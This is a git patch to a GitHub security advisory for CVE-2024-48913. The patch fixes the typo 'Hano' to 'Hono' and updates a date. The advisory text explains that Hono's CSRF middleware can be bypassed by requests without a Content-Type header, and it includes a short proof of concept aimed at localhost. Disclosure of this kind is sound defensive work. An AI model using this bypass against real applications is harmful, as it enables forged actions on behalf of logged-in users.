From 7ad8b9b4869ace0c9200a3968108143635becf84 Mon Sep 17 00:00:00 2001
From: Aditya Mathur <57684218+MathurAditya724@users.noreply.github.com>
Date: Thu, 7 Nov 2024 23:33:29 +0530
Subject: [PATCH] Improve GHSA-2234-fmw7-43wr
---
.../2024/10/GHSA-2234-fmw7-43wr/GHSA-2234-fmw7-43wr.json | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/advisories/github-reviewed/2024/10/GHSA-2234-fmw7-43wr/GHSA-2234-fmw7-43wr.json b/advisories/github-reviewed/2024/10/GHSA-2234-fmw7-43wr/GHSA-2234-fmw7-43wr.json
index c9343a690b9e5..62a778c6cf16a 100644
--- a/advisories/github-reviewed/2024/10/GHSA-2234-fmw7-43wr/GHSA-2234-fmw7-43wr.json
+++ b/advisories/github-reviewed/2024/10/GHSA-2234-fmw7-43wr/GHSA-2234-fmw7-43wr.json
@@ -1,12 +1,12 @@
{
"schema_version": "1.4.0",
"id": "GHSA-2234-fmw7-43wr",
- "modified": "2024-10-15T19:56:22Z",
+ "modified": "2024-10-28T13:41:00Z",
"published": "2024-10-15T17:43:50Z",
"aliases": [
"CVE-2024-48913"
],
- "summary": "Hano allows bypass of CSRF Middleware by a request without Content-Type header.",
+ "summary": "Hono allows bypass of CSRF Middleware by a request without Content-Type header.",
"details": "### Summary\nBypass CSRF Middleware by a request without Content-Type herader.\n\n### Details\nAlthough the csrf middleware verifies the Content-Type Header, Hono always considers a request without a Content-Type header to be safe.\n\nhttps://github.com/honojs/hono/blob/cebf4e87f3984a6a034e60a43f542b4c5225b668/src/middleware/csrf/index.ts#L76-L89\n\n### PoC\n```server.js\n// server.js\nimport { Hono } from 'hono'\nimport { csrf }from 'hono/csrf'\nconst app = new Hono()\napp.use(csrf())\napp.get('/', (c) => {\n return c.html('Hello Hono!')\n})\napp.post('/', async (c) => {\n console.log(\"executed\")\n return c.text( await c.req.text())\n})\nDeno.serve(app.fetch)\n```\n\n```poc.html\n\n\n\n```\n\nSimilarly, the fetch API does not add a Content-Type header for requests that do not include a Body.\n```PoC2.js\nawait fetch(\"http://localhost:8000\", { method: \"POST\", credentials: \"include\"});\n```\n\n### Impact\nBypass csrf protection implemented with hono csrf middleware.\n",
"severity": [
{